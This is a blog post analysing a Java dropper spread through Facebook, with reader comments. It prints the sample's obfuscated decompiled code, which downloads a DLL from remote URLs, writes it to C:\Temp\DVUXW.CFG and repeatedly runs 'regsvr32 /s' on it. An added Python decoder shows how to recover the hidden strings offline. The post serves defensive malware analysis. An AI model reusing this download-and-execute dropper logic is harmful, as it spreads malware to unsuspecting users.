    StringBuilder EXRCSQZHBXONTDCJDKHHGQXL = new StringBuilder(FYTFHDCQEJALCVHVO.length);
    for (int i = 0; i < FYTFHDCQEJALCVHVO.length; i++) {
      Object NXCJBUAWXRGTXWMAHLVXKDY = PTTQWFAFBA.eval(FYTFHDCQEJALCVHVO[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(NXCJBUAWXRGTXWMAHLVXKDY));
      EXRCSQZHBXONTDCJDKHHGQXL.append((char)HOFMVNSB);
    }
    return EXRCSQZHBXONTDCJDKHHGQXL.toString();
  }

  public static String MOXEQWXISCYNNWKTZZSFWDE() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] WNGLMMJMJETKBDUOXWG = { "5448-5334", "837-736", "-8790+8893", "3219-3104", "382084/3238", "9614-9500", "-6355+6406", "-8462+8512", "1986-1954", "8435-8388", "-245+360" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder QSPKYREOAFQCRN = new StringBuilder(WNGLMMJMJETKBDUOXWG.length);
    for (int i = 0; i < WNGLMMJMJETKBDUOXWG.length; i++) {
      Object MAGXWHPMLWCNYSQWDSMLQXDB = PTTQWFAFBA.eval(WNGLMMJMJETKBDUOXWG[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(MAGXWHPMLWCNYSQWDSMLQXDB));
      QSPKYREOAFQCRN.append((char)HOFMVNSB);
    }
    return QSPKYREOAFQCRN.toString();
  }

  public static String IBUPOZJE() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] AWEJEIHRHYSRQJROC = { "-9628+9692", "-2870+2934" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder CKUNUFCT = new StringBuilder(AWEJEIHRHYSRQJROC.length);
    for (int i = 0; i < AWEJEIHRHYSRQJROC.length; i++) {
      Object XUQOYXRSCEBJYGAVPNYEOX = PTTQWFAFBA.eval(AWEJEIHRHYSRQJROC[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(XUQOYXRSCEBJYGAVPNYEOX));
      CKUNUFCT.append((char)HOFMVNSB);
    }
    return CKUNUFCT.toString();
  }

  public static void EEZDHQ() throws ScriptException, IOException, InterruptedException {
    int d = 0;
    while (d < 15) {
      Runtime.getRuntime().exec(MOXEQWXISCYNNWKTZZSFWDE() + " " + CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX());
      Thread.sleep(765L);
      d++;
    }
  }

  public static void WRZSTL(String TLOLIOXWCPD, String QVBBFQEDYWO) throws IOException, ScriptException, InterruptedException
  {
    InputStream WHBMGLAOEDNRJGMHKUKECXJJ = URI.create(TLOLIOXWCPD).toURL().openStream();
    Files.copy(WHBMGLAOEDNRJGMHKUKECXJJ, Paths.get(QVBBFQEDYWO, new String[0]), new CopyOption[0]);
    EEZDHQ();
  }

  public static void main(String[] args) throws Exception
  {
    new File(CAHWNGGYPLSBBUUNSBJ()).mkdir();
    File q = new File(CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX());
    if (q.exists())
    {
      EEZDHQ();
    }
    else {
      String[] VRNBQZSLUR = PACVA().split(IBUPOZJE());
      for (String DXFKOE : VRNBQZSLUR)
      {
        URL currentDXFKOE = new URL(DXFKOE);
        HttpURLConnection UKGANNEOZAGVBOQAMFBXU = (HttpURLConnection)currentDXFKOE.openConnection();
        UKGANNEOZAGVBOQAMFBXU.connect();
        if (UKGANNEOZAGVBOQAMFBXU.getResponseCode() / 100 == 2) {
          String HFCIHAULSQLBJMNFAFQ = DXFKOE;
          String CPTENFMT = CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX();
          WRZSTL(HFCIHAULSQLBJMNFAFQ, CPTENFMT);
          break;
        }
      }
    }
  }
}

Code like this will not make much sense to anybody as it stands; it has clearly been processed by some kind of obfuscator. The presence of an HttpURLConnection object is already a red flag, though. After removing all the potentially malicious calls and placing prints for the strings that are de-obfuscated at runtime, I got the following :

C:\\Temp\\DVUXW.CFG
regsvr32 /s C:\\Temp\\DVUXW.CFG
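The de-obfuscation step described above can be reproduced offline, without running the sample or a JavaScript engine. The following Python decoder is an added example (my own code, not from the post): it evaluates the three expression shapes the class uses, mimics the DecimalFormat("#.#") plus Integer.parseInt step, and splits the result on the separator hidden in IBUPOZJE(). The separator array is copied from the decompiled class; SAMPLE_EXPRS is a constructed array in the same encoding, not taken from the malware.

```python
import re

# Only the three expression shapes the decompiled class uses; anything else is
# rejected instead of being handed to an evaluator.
_EXPR = re.compile(r"^(-?\d+)([-+/])(\d+)$")

def eval_expr(expr: str) -> float:
    """Evaluate one expression as the JS engine would ('/' is float division)."""
    m = _EXPR.match(expr.strip())
    if not m:
        raise ValueError(f"unsupported expression: {expr!r}")
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op == "+":
        return float(a + b)
    if op == "-":
        return float(a - b)
    return a / b  # "x/0" raises ZeroDivisionError; parseInt would reject it too

def to_char(value: float) -> str:
    """Mimic DecimalFormat("#.#") -> Integer.parseInt -> (char) cast.
    "#.#" rounds to one decimal, so 104.04 prints as "104" but 104.5 prints
    as "104.5", which parseInt rejects: a fractional result is not a char."""
    rounded = round(value, 1)
    if rounded != int(rounded):
        raise ValueError(f"non-integer code point from {value}")
    code = int(rounded)
    if not 0 <= code <= 0xFFFF:
        raise ValueError(f"outside Java char range: {code}")
    return chr(code)

def decode(exprs) -> str:
    """Decode one expression array into the string it hides."""
    return "".join(to_char(eval_expr(e)) for e in exprs)

# Separator array copied from IBUPOZJE() in the decompiled class above.
SEPARATOR_EXPRS = ["-9628+9692", "-2870+2934"]

# Constructed sample in the same encoding (not taken from the malware):
# "a.dat" + separator + "b.dat", enough to show how main() splits the list.
SAMPLE_EXPRS = ["200-103", "-10+56", "1000/10", "-3+100", "232/2", "100-36",
                "-36+100", "294/3", "146-100", "-50+150", "485/5", "300-184"]

def decode_url_list(blob_exprs, sep_exprs=SEPARATOR_EXPRS):
    """Reproduce main(): decode the blob, then split on the decoded separator."""
    return decode(blob_exprs).split(decode(sep_exprs))

if __name__ == "__main__":
    print(decode(SEPARATOR_EXPRS))        # @@
    print(decode_url_list(SAMPLE_EXPRS))  # ['a.dat', 'b.dat']
```

To decode the real arrays, paste the string literals from PACVA() into a list and pass it to decode_url_list; any expression that does not produce an integer code point raises instead of being silently skipped.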

I have to say that the obfuscator did a pretty good job of scrambling these. From what I can gather, the JAR is responsible for calling regsvr32 on the DVUXW.CFG file, and for downloading it from a Dropbox account if it’s not present on the system yet. The file itself is actually a DLL. I downloaded it and tried to dissect it on my Windows XP virtual machine, but I did not get far : it is quite big. However, it imports the most important functions from the Windows Cryptography API, as well as WriteFile. However, I was not able to see any communication attempts or socket creation inside the code, which means that this is probably not a piece of ransomware like CryptoLocker. It seems like the binary can be identified by the strings fuckoffnabs1 and myNameIsPepe present inside it. I also submitted the binary to Malwr for analysis.


4 responses to "Worms distributed via Facebook : a case study"

  1. kotisded writes:

    Damn, I have it also; I received it via Facebook from a programmer, so I opened it. I already deleted dxuxw.cfg. I already noticed that some program called AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + some more A is autostarting with Windows. You can see it in msconfig. We’ll see what’ll happen; I’ll monitor CPU, RAM, and web connections.

  2. kotisded writes:

    It started a few processes called explorer.exe *32; one of them was always using one thread full time while connected to the internet. Some files were also located in c:\users\*\Appdata\Microsoft\Windows\Temp. A few also in the registry. ComboFix fixed almost everything; the AAAAAAAAAAAAAAAAAAA(*) process was in msconfig on startup. I disabled it and everything works fine for now.

  3. Lucas writes:

    What can I do with a friend’s computer if he has run this .jar and it has started spamming people on Facebook with this?

    • Daniel writes:

      Unfortunately, I have no idea. However, I doubt if these jar/dll files are actually responsible for spreading themselves : the only thing the JAR does is download the DLL, and I haven’t seen any WinSock calls in the DLL, which would obviously be needed in order to post anything to Facebook. I can only speculate, but I guess that these messages are the job of a FB application, or a malicious plugin installed inside the browser.
